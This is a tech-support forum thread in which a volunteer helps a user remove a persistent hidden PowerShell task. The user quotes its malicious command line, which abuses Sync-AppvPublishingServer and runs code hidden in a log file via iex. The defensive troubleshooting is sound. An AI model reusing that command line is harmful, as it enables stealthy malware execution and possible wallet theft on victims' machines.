EffWerd Posted March 25, 2022 ID:1508502 Share Posted March 25, 2022 Hi, I've got an instance of powershell.exe which keeps coming back and seems to be up to no good. It's using a bit of system resources and has a bit of a suspect command line attached to it. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; $a = Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;iex $a;hackbacktrack ko8E7GIIPGwUKDdghNlVPuHA6yXABLHxKS1UBSVQI34=} Also seems to be pinging a server and also scanning through the file system if I watch it with Procmon. Can kill the process and it doesn't start back up till windows is restarted. Can't see anything obvious in Autoruns. Have run windows defender and malwarebytes scans but no result. Have attached FRST results. Thanks in advance if you can help. Addition.txt FRST.txt Link to post Share on other sites More sharing options...
Maurice Naggar Posted March 25, 2022 ID:1508509 Share Posted March 25, 2022 Hello, The Microsoft Safety Scanner is a free Microsoft stand-alone virus scanner that can be used to scan for & remove malware or potentially unwanted software from a system. The download links & the how-to-run-the tool are at this link at Microsoft https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download Look on Scan Options & select CUSTOM scan & then select the C drive to be scanned. Then start the scan. Have lots of patience. Once you start the scan & you see it started, then leave it be. Once you see it has started, take a long long break; walk away. Do not pay credence if you see some intermediate early flash messages on screen display. The only things that count are the End result at the end of the run. Again, any on-screen display about repeat 'infection' is not to be relied on. Ignore those. We only rely on the end result that is on the log-report-file. This is likely to run for many hours ( depending on number of files on your machine & the speed of hardware.) The log is named MSERT.log the log will be at Windows\debug\msert.log Please attach that log with your reply. Link to post Share on other sites More sharing options...
Solution Maurice Naggar Posted March 25, 2022 Solution ID:1508560 Share Posted March 25, 2022 Hello. @EffWerd Next steps. I see you have Controlled Folder Access running and blocking things. It's possible you're blocking things you should not be blocking. Please see the following article and temporarily DISABLE your Controlled Folder Access How to Enable or Disable Controlled Folder Access in Windows 10https://www.tenforums.com/tutorials/113380-how-enable-disable-controlled-folder-access-windows-10-a.html I've pored over the FRST reports. I do see the scheduled task for the process that you mentioned at the top. The fix below will get it removed. Next, a custom script to do checks & some cleanups. We will use FRST64.exe on the Downloads folder to run a custom script. The system will be rebooted after the script has run. This custom script is for EFFwerd only / for this machine only. This custom script has some specific things, plus some general aspect to help the system overall. Hoping it will run in under say 25 minutes or less. NOTE-1: This script will run a scan using System File Checker to check that all Microsoft operating system files are valid and not corrupt and attempt to correct any invalid files. . I NOTE-2: As part of run it will remove the scheduled task named Netservices. That should do away with the 'thing' you described. This will also remove a few 'no file' & unneeded tasks. I am not seeing signs of malware. The vbs file SyncAppvPublishingServer.vbs is typically found on Windows 10. That is not a malware. Please be sure to Close any open work files, documents, any apps you started yourself before starting this. If there are any CD / DVD / or USB-flash-thumb or USB-storage drives attached, please disconnect any of those. Please save the (attached file named) FIXLIST.txt to the Downloads folder Fixlist.txt <<< - - - - - Then, Start the Windows Explorer and then, go to the Downloads folder. RIGHT click on FRST64.exe and select RUN as Administrator and allow it to proceed. Reply YES when prompted to allow to run. to run the tool. If the tool warns you the version is outdated, please download and run the updated version. IF Windows prompts you about running this, select YES to allow it to proceed. IF you get a block message from Windows about this tool...... click line More info information on that screen and click button Run anyway on next screen. on the FRST window: Click the Fix button just once, and wait. PLEASE have lots and lots of patience when this starts. You will see a green progress bar start. Lots of patience. If you receive a message that a reboot is required, please make sure you allow it to restart normally. The tool will complete its run after restart. When finished, the tool will make a log ( Fixlog.txt) in the same location from where it was run. Please attach the FIXLOG.txt with your next reply later, at your next opportunity. Link to post Share on other sites More sharing options...
EffWerd Posted March 26, 2022 Author ID:1508611 Share Posted March 26, 2022 Hi Maurice, Thanks a lot for you help with this. I ran the MS Safety Scanner which went fine for 3.5 hours then just stalled out on a particular file... sat there for another hour to see if it would pick up again but no luck. It did create the msert.log but nothing in it of value it seems (attached). So I went ahead and ran the FRST fix - log is attached. The powershell.exe process didn't return after reboot, so that's good. Interesting how hidden the whole thing is - I think for sure it was definitely something malicious, I did see it trying to scan for what I assume are crypto wallet folders at one stage in Procmon (I forgot to take a screenshot though...) Let me know if you think I should try and re-run the MS Safety Scanner tool again - it did count 24 'infected' files before stalling out. Cheers! Let me know if you have a ko-fi account or something, I'll buy you a coffee or two for your help :) Fixlog.txt msert.log Link to post Share on other sites More sharing options...
Maurice Naggar Posted March 26, 2022 ID:1508613 Share Posted March 26, 2022 Thank you for the reports. The custom script run has done as intended. The task that was suspect has been removed. The VBS file associated on that task is found to be no threat at Virustotal. The script completed so we are done with that. We are also done with the MSERT tool. Sad to learn that it froze up. That can happen to any machine. and the display of "file infected 24" needs to disregarded because this display is a known behavior of the tool. It pre-displays what it suspects as possibles but that is far from the final judgment when it does a double check ( at end of its run) with the Microsoft cloud. Lets put that tool aside. Scratch that suggestion. Instead we can use a different free tool. > Next to do This will be a check with ESET Onlinescanner for viruses, other malware, adwares, & potentially unwanted applications. Go to https://download.eset.com/com/eset/tools/online_scanner/latest/esetonlinescanner.exe It will start a download of "esetonlinescanner.exe" Save the file to your system, such as the Downloads folder, or else to the Desktop. Go to the saved file, and double click it to get it started. When presented with the initial ESET options, click on "Computer Scan". Next, when prompted by Windows, allow it to start by clicking Yes When prompted for scan type, Click on Full scan Look at & tick ( select ) the radio selection "Enable ESET to detect and quarantine potentially unwanted applications" and click on Start scan button. Have patience. The entire process may take an hour or more. There is an initial update download. There is a progress window display. You may step away from machine &. Let it be. That is, once it is under way, you should leave it running. It will run for several hours. At screen "Detections occured and resolved" click on blue button "View detected results" On next screen, at lower left, click on blue "Save scan log" View where file is to be saved. Provide a meaningful name for the "File name:" On last screen, set to Off (left) the option for Periodic scanning Click "save and continue" Please attach the report file so I can review Link to post Share on other sites More sharing options...
EffWerd Posted March 26, 2022 Author ID:1508616 Share Posted March 26, 2022 Hi Maurice, ESET log attached. No result. Let me know if you think there is possibly more to do, much appreciated. I'll keep an eye on things to see if this rogue process comes back in any case. Thanks! eset log.txt Link to post Share on other sites More sharing options...
Maurice Naggar Posted March 26, 2022 ID:1508634 Share Posted March 26, 2022 That ESET report result is perfect. No virus; no malware. I believe your pc is good-to-go. Your system is on Microsoft Windows 10 Pro Version 21H1 19043.1586. I would suggest you make a run to Windows Update and see about getting build version 21H2. insure that this pc is all up-to-date with security updates & cumulative upates on Windows. select the Windows Start button, and then go to Settings > Update & Security > Windows Update . and click Check for Updates. Have much patience. Link to post Share on other sites More sharing options...
EffWerd Posted March 26, 2022 Author ID:1508691 Share Posted March 26, 2022 Thanks Maurice for your help, legend - got the scorpion off my back. Link to post Share on other sites More sharing options...
Maurice Naggar Posted March 26, 2022 ID:1508692 Share Posted March 26, 2022 You are very welcome. This is the all clear for this case. This next tool is to cleanup the tools we used during this case.What follows is just a tools cleanup. Please download KpRm by kernel-panik and save it to your desktop. right-click kprm_(version).exe and select Run as Administrator. Read and accept the disclaimer. When the tool opens, ensure all boxes under Actions are checked. Under Delete Quarantines select Delete Now, then click Run. Once complete, click OK. A log will open in Notepad titled kprm-(date).txt. You may attach that file to your next reply. (not compulsory) Link to post Share on other sites More sharing options...
Maurice Naggar Posted March 26, 2022 ID:1508693 Share Posted March 26, 2022 Glad we could help. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request. This applies only to the originator of this thread. Other members who need assistance please start your own topic in a new thread. Please review the following to help you better protect your computer and privacy Tips to help protect from infection Thank you Link to post Share on other sites More sharing options...
Recommended Posts